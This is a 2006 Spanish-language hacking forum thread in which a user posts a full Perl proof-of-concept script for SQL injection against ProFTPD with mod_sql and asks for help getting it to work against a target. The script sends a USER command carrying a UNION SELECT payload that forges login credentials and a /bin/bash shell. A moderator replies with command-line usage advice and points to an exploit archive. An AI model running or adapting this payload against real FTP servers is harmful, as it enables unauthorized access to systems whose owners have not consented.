Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Agosto 21, 2008, 09:48:10
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: problema con exploit perl 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: problema con exploit perl  (Leído 256 veces)
nosfer
Recien Llegado
*
Desconectado Desconectado

Mensajes: 4


Ver Perfil Email
« en: ſeptiembre 16, 2006, 10:45:04 »
#!/usr/bin/perl
# Sql inject on ProFTPD with mod_sql proof of concept script
# runlevel [ runlevel @raregazz.org ]
# Spain, 2003

use IO::Socket;
if( @ARGC<2){
    print "\nProof Of Concept Sql Inject on ProFTPD\n";
    print "Usage: perl poc-sqlftp <target> [1=Alternate query]\n\n";
    exit(0);
};

$server = $ARGV[0];
$query = $ARGV[1];
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1)
                          or die "Can't connect. \n";
if(defined($line=<$remote>)){
    print STDOUT $line;
}

# Proof of concept query, it may change on the number of rows
# By default, it can query User, Pass, Uid, Gid, Shell or
# User, Pass, Uid, Gid, Shell, Path, change the union query...

if($query eq "1"){
    print $remote "USER ')UNION SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='\n";
}else{
    print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash' WHERE(''='\n";
};
if(defined($line=<$remote>)){
    print STDOUT $line;
}
print $remote "PASS p\n";
if(defined($line=<$remote>)){
    print STDOUT $line;
}
print "Sent query to $ARGV[0]\n";
if($line =~ /230/){  #logged in
    print "[------- Sql Inject Able \n";
}else{
    print "[------- Sql Inject Unable \n";
}
close $remote;
consegui ese exploit, lo tengo ya todo compilado, pero a la hora de atacar me dice he probado poniendo la ip, poniendo numeros luego..... la web..... de todo... alguien me puede ayudar por favor? gracias =)
En línea
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2061


foro.new-bytes.net


Ver Perfil WWW
« Respuesta #1 en: ſeptiembre 17, 2006, 02:36:38 »
mmm parece que te faltan datos.. por lo que vi...

perl nombreexploit.pl ip 1

que raro que no salga mas info sobre el "target".. intenta con eso como borraste los numeros nose si lo isiste asi...

o talves puedes ser

perl nombreexploit.pl 1 IP
En línea

http://foro.new-bytes.net
nosfer
Recien Llegado
*
Desconectado Desconectado

Mensajes: 4


Ver Perfil Email
« Respuesta #2 en: ſeptiembre 17, 2006, 02:43:24 »
Cita de: OzX en ſeptiembre 17, 2006, 02:36:38
mmm parece que te faltan datos.. por lo que vi...

perl nombreexploit.pl ip 1

que raro que no salga mas info sobre el "target".. intenta con eso como borraste los numeros nose si lo isiste asi...

o talves puedes ser

perl nombreexploit.pl 1 IP



he probado a poner de todo :S, si no pongo "nombreexploit.pl" antes de la linea de comandos me dice Can't open perl script "poc-sqlftp": No such file or directory, yo ya no se que hacer :S, he probado a ponerlo con el nombre de la pagina... con la ip, con y sin "nombreexploit.pl" delante, de todo :S y aun asi me dice lo que acabo de nombrar, o lo que puse en el 1er post :S
En línea
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2061


foro.new-bytes.net


Ver Perfil WWW
« Respuesta #3 en: ſeptiembre 17, 2006, 04:43:34 »
por regla tienes que colcoar
perl nombre.pl

talves n te funke por esto
mod_sql proof of concept script

es una muestra de concepto del script.. talves deves modficar alguhas cosas.. ve el milw0rm si esta..
En línea

http://foro.new-bytes.net
nosfer
Recien Llegado
*
Desconectado Desconectado

Mensajes: 4


Ver Perfil Email
« Respuesta #4 en: ſeptiembre 17, 2006, 06:25:32 »
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: problema con exploit perl « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC